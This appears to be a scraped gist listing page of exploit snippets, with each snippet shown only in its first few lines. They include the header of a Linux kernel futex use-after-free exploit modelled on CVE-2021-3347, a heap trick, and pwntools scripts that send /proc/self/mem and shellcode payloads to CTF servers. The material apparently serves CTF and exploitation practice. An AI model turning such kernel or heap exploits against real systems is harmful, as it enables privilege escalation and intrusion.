st424204
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Futex Waiter Kernel Stack Use After free | |
| // Vuln inspired by CVE-2021-3347 | |
| // exploit tech ref https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153.html | |
| // leak kernel stack and overwrite kernel stack return address to userspace ( SMAP & SMEP disable) | |
| // gcc exp.c -static -masm=intel -o exp | |
| #define _GNU_SOURCE /* See feature_test_macros(7) */ | |
| #include <sys/socket.h> | |
| #include <string.h> | |
| #include <linux/futex.h> | |
| #include <stdint.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int main(){ | |
| size_t *x = malloc(0x10); | |
| size_t *a = malloc(0x500); | |
| size_t* b = malloc(0x10); | |
| x[2] = -0x10; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.arch = "amd64" | |
| r = remote("34.82.101.212", 10010) | |
| r.sendlineafter(":","/proc/self/mem") | |
| r.sendlineafter(":",str(0x4b0f40)) | |
| payload = asm(""" | |
| push rax | |
| pop rdi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| context.arch = 'amd64' | |
| if len(sys.argv) >1: | |
| r = remote('52.142.217.130', 13370) | |
| else: | |
| r = process('./HeapSchool666') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # by @tens | |
| from pwn import * | |
| import sys | |
| import time | |
| import random | |
| host = 'plainnote.balsnctf.com' | |
| port = 54321 |